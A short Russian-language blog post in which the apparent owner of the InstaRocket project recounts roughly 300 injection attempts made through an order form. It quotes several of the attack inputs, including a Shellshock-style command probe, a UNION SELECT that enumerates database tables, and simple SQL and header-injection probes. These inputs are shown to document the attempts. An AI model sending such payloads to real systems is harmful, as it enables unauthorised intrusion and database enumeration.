Попытка SQL injection
January 26, 2018
View 267
Как только проект начинает набирать популярность, и у него там более 1000 клиентов, ему пытаются сделать SQL injection (так сказать, взломать). Попытка была через форму заказа и там попыток 300 было.
Go go InstaRocket!
Примеры запросов и как они должны были себя повести:
() { :; }; printf 'Content-Type: text/json\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'
1' UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
vega@example.combogusVega-Inject:bogus
vega@example.com AND 1=2 --